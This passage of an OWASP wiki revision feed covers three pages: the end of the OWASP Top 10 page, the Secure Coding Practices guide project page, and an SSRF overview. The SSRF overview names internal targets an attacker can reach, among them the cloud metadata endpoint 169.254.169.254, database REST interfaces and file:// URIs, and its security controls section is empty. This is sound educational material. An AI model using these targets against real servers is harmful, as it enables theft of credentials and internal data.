*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide&amp;diff=231374</id>
		<title>OWASP Secure Coding Practices - Quick Reference Guide</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide&amp;diff=231374"/>
				<updated>2017-07-06T12:20:13Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added link to a related project&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Main  ====&lt;br /&gt;
== Welcome to the Secure Coding Practices Quick Reference Guide Project ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Secure Coding Practices Quick Reference Guide is a technology agnostic set of general software security coding practices, in a comprehensive checklist format, that can be integrated into the development lifecycle. At only 17 pages long, it is easy to read and digest.&lt;br /&gt;
&lt;br /&gt;
The focus is on secure coding requirements, rather then on vulnerabilities and exploits. It includes an introduction to Software Security Principles and a glossary of key terms.&lt;br /&gt;
&lt;br /&gt;
It is designed to serve as a secure coding kick-start tool and easy reference, to help development teams quickly understand secure coding practices.&lt;br /&gt;
&lt;br /&gt;
=== Sections of the Guide: ===&lt;br /&gt;
&lt;br /&gt;
* Table of contents&lt;br /&gt;
* Introduction&lt;br /&gt;
* Software Security Principles Overview&lt;br /&gt;
* Secure Coding Practices Checklist &lt;br /&gt;
* Links to useful resources &lt;br /&gt;
* Glossary of important terminology&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Download the current v2 (Stable) release:'''&lt;br /&gt;
 &lt;br /&gt;
* [[Media:OWASP_SCP_Quick_Reference_Guide_v2.pdf|English version PDF]]&lt;br /&gt;
* [[Media:OWASP_SCP_Quick_Reference_Guide_v2.doc|English version MS Word]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Translations:'''&lt;br /&gt;
&lt;br /&gt;
* [[Media:OWASP_SCP_v1.3_pt-BR.pdf|Brazilian Portuguese Translation PDF]]&lt;br /&gt;
* [[Media:OWASP_SCP_v1.3_pt-PT.pdf|Portugal Portuguese Translation PDF]]&lt;br /&gt;
* [[Media:2011%EB%85%846%EC%9B%94_OWASP_%EC%8B%9C%ED%81%90%EC%96%B4%EC%BD%94%EB%94%A9%EA%B7%9C%EC%B9%99_v2_KOR.pdf|Korean Translation PDF]]&lt;br /&gt;
* [[Media:OWASP_SCP_Quick_Reference_Guide_SPA.doc|Spanish Translation doc]]&lt;br /&gt;
* [[Media:OWASP_SCP_Quick_Reference_Guide_%28Chinese%29.pdf|Chinese Translation PDF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Related Presentations:'''&amp;lt;br&amp;gt;&lt;br /&gt;
This slide deck incorporates many concepts from the Quick reference guide, but also utilizes other OWASP resources.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.owasp.org/images/b/ba/Web_Application_Development_Dos_and_Donts.ppt Web Application Development Dos and Donts - Presentation from the Royal Bank of Scotland]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Related Projects:'''&amp;lt;br&amp;gt;&lt;br /&gt;
[https://github.com/Checkmarx/Go-SCP Go programming language secure coding practices guide, based on the OWASP Secure Coding Practices]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Project Feedback and Disposition History'''&lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/6/64/SCP-QRG_Revisions_History.xls XLS Feedback Spreadsheet] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
== Feedback and Participation: ==&lt;br /&gt;
&lt;br /&gt;
I hope you find the OWASP Secure Coding Practices Quick Reference Guide Project useful. Please contribute to the Project by sending your comments, questions, and suggestions to [mailto:Keith.Turpin@owasp.org keith.turpin@owasp.org].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Project mailing list and archives: &lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/owasp-secure-coding-practices subscription page.]&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
== Project Contributors: ==&lt;br /&gt;
&lt;br /&gt;
If you contribute to this Project, please add your name here&amp;lt;br&amp;gt;&lt;br /&gt;
'''Project Lead:'''&lt;br /&gt;
* [[user:Keith Turpin|Keith Turpin]]&lt;br /&gt;
 &lt;br /&gt;
'''Contributors:'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Dan Kranz&lt;br /&gt;
* Walt Pietrowski&lt;br /&gt;
* Catherine Spencer&lt;br /&gt;
* [mailto:Caleb.mcgary@gmail.com Caleb McGary]&lt;br /&gt;
* [mailto:bradcausey@owasp.org Brad Causey]&lt;br /&gt;
* [mailto:ludovic.petit@owasp.org Ludovic Petit]&lt;br /&gt;
* [mailto:michael.scovetta@gmail.com Michael V. Scovetta]&lt;br /&gt;
* [mailto:jim.manico@owasp.org Jim Manico]&lt;br /&gt;
* Jason Coleman&lt;br /&gt;
* [mailto:anurag.agarwal@yahoo.com Anurag Agarwal]&lt;br /&gt;
* [mailto:petand@lvk.cs.msu.su Andrew Petukhov]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Translation Contributors'''&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
'''Portuguese Translation'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* [mailto:tarciziovn@gmail.com Tarcizio Vieira Neto]&lt;br /&gt;
* [mailto:silviofilhosf@gmail.com Sílvio Correia Filho]&lt;br /&gt;
* [mailto:leandrock@gmail.com Leandro Gomes]&lt;br /&gt;
'''Korean Translation'''&amp;lt;br&amp;gt;&lt;br /&gt;
* OWASP Korea chapter&lt;br /&gt;
'''Spanish Translation'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Canedo,Gerardo&lt;br /&gt;
* Flores,Mauro&lt;br /&gt;
* [[user:Alberto_Daniel_Hill|Hill,Alberto]]&lt;br /&gt;
* Martinez,Mateo&lt;br /&gt;
* Papaleo,Mauricio&lt;br /&gt;
* Soarez,Nicolás&lt;br /&gt;
* Targetta, Cecilia&lt;br /&gt;
'''Chinese Translation'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [mailto:wangj@owasp.org.cn Jie Wang]&lt;br /&gt;
* Yongliang He&lt;br /&gt;
* Henghui Lin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Project About ====&lt;br /&gt;
{{:Projects/OWASP Secure Coding Practices - Quick Reference Guide | Project About}}&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Secure Coding Practices - Quick Reference Guide]] [[Category:OWASP_Document]] [[Category:OWASP Best Practices]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document|OWASP Release Quality Document]]&lt;br /&gt;
[[Category:SAMM-SR-1]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Server_Side_Request_Forgery&amp;diff=230987</id>
		<title>Server Side Request Forgery</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Server_Side_Request_Forgery&amp;diff=230987"/>
				<updated>2017-06-26T16:39:48Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added a capital letter and a hyphen&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Overview==&lt;br /&gt;
In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or a modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal etc.).&lt;br /&gt;
&lt;br /&gt;
When the manipulated request goes to the server, the server-side code picks up the manipulated URL and tries to read data to the manipulated URL. By selecting target URLs the attacker may be able to read data from services that are not directly exposed on the internet:&lt;br /&gt;
* Cloud server meta-data - Cloud services such as AWS provide a REST interface on http://169.254.169.254/ where important configuration and sometimes even authentication keys can be extracted&lt;br /&gt;
* Database HTTP interfaces - NoSQL database such as MongoDB provide REST interfaces on HTTP ports. If the database is expected to only be available to internally, authentication may be disabled and the attacker can extract data&lt;br /&gt;
* Internal REST interfaces&lt;br /&gt;
* Files - The attacker may be able to read files using file:// URIs&lt;br /&gt;
&lt;br /&gt;
The attacker may also use this functionality to import untrusted data into code that expects to only read data from trusted sources, and as such circumvent input validation.&lt;br /&gt;
&lt;br /&gt;
== Security controls for stopping SSRF ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Abuse of Functionality]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	</feed>